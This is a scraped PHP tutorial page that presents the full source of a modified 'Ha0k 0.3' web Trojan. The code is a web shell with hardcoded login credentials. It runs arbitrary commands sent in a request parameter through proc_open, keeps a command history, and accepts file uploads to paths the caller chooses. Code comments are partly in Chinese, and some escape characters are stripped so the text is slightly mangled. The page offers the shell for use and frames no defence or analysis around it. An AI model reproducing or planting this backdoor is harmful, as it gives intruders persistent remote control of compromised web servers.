Ha0k 0.3 PHP web Trojan modified version_PHP tutorial
WBOYOriginal
2016-07-21 15:44:08858browse
Copy code The code is as follows:
//Multiple users can be set here $passwd = array('ha0k' => 'ha0k', 'hackerdsb'=>' hackerdsb'); /* Set the alias of the command here*/ $aliases = array('ls' => 'ipconfig', 'll' => 'ls -lvhF') ; if (!isset($_SERVER['PHP_AUTH_USER'])||!isset($_SERVER['PHP_AUTH_PW'])|| !isset($passwd[$_SERVER['PHP_AUTH_USER']]) || $passwd[$_SERVER['PHP_AUTH_USER']] != $_SERVER['PHP_AUTH_PW']) { header('WWW-Authenticate: Basic realm="by Ha0k"'); header('HTTP/1.0 401 Unauthorized'); $authenticated = false; } else { $authenticated = true; /* Start session */ session_start( ); /* Initialize session. */ if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) { $_SESSION['cwd '] = getcwd(); //Get the current directory $_SESSION['history'] = array(); $_SESSION['output'] = ''; } if ( !empty($_REQUEST['command'])) { if (get_magic_quotes_gpc()) { //0 means off, 1 means on, filter when on /* We don't want to add the commands to the history in the * escaped form, so we remove the backslashes now. */ $_REQUEST['command'] = stripslashes($_REQUEST['command']); //will use addslashes() The string processed by the function returns as it is } /* history */ if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) != = false) //Find the value in the saved array unset($_SESSION['history'][$i]); //Destroy array_unshift($_SESSION['history'], $_REQUEST['command ']);//The array_unshift() function is to insert new elements into an array. And this new array will be added to the beginning of the original array. What the function ultimately returns is the array after inserting new elements. /* 输出Ha0k# command */ $_SESSION['output'] .= 'Ha0k# ' . $_REQUEST['command'] . "n"; /* Initialize the current working directory. */ if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) { $_SESSION['cwd'] = dirname(__FILE__); //获取当前所在目录 } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) { /* The current command is a 'cd' command which we have to handle * as an internal shell command. */ if ($regs[1][0] == '/') { /* Absolute path, we use it unchanged. */ $new_dir = $regs[1]; } else { /* Relative path, we append it to the current working * directory. */ $new_dir = $_SESSION['cwd'] . '/' . $regs[1]; } /* Transform '/./' into '/' */ while (strpos($new_dir, '/./') !== false) $new_dir = str_replace('/./', '/', $new_dir); /* Transform '//' into '/' */ while (strpos($new_dir, '//') !== false) $new_dir = str_replace('//', '/', $new_dir); /* Transform 'x/..' into '' */ while (preg_match('|/..(?!.)|', $new_dir)) $new_dir = preg_replace('|/?[^/]+/..(?!.)|', '', $new_dir); if ($new_dir == '') $new_dir = '/'; /* Try to change directory. */ if (@chdir($new_dir)) { //改变当前目录 $_SESSION['cwd'] = $new_dir; } else { $_SESSION['output'] .= "cd: could not change to: $new_dirn"; } } else { /* The command is not a 'cd' command, so we execute it after * changing the directory and save the output. */ chdir($_SESSION['cwd']); //改变目录 /* 别名扩展 */ $length = strcspn($_REQUEST['command'], " t"); //查找t字符串,返回位置 $token = substr($_REQUEST['command'], 0, $length); //取字符串0-t if (isset($aliases[$token])) $_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length); $p = proc_open($_REQUEST['command'], //执行脚本 array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io); /* 读出发送 */ while (!feof($io[1])) { $_SESSION['output'] .= htmlspecialchars(fgets($io[1]), //转换特殊字符为HTML字符编码 ENT_COMPAT, 'GB2312'); } /* 读出 */ while (!feof($io[2])) { $_SESSION['output'] .= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'GB2312'); } fclose($io[1]); fclose($io[2]); proc_close($p);//关闭管道 } } /* 构建在JavaScript使用命令历史记录 */ if (empty($_SESSION['history'])) { $js_command_hist = '""'; } else { $escaped = array_map('addslashes', $_SESSION['history']); $js_command_hist = '"", "' . implode('", "', $escaped) . '"';//将数组搞成字符串 } } header('Content-Type: text/html; charset=GB2312'); echo '' . "n"; ?> if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) { copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']); //echo "上传文件成功: " . $HTTP_POST_FILES['userfile']['name']; } ?> "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn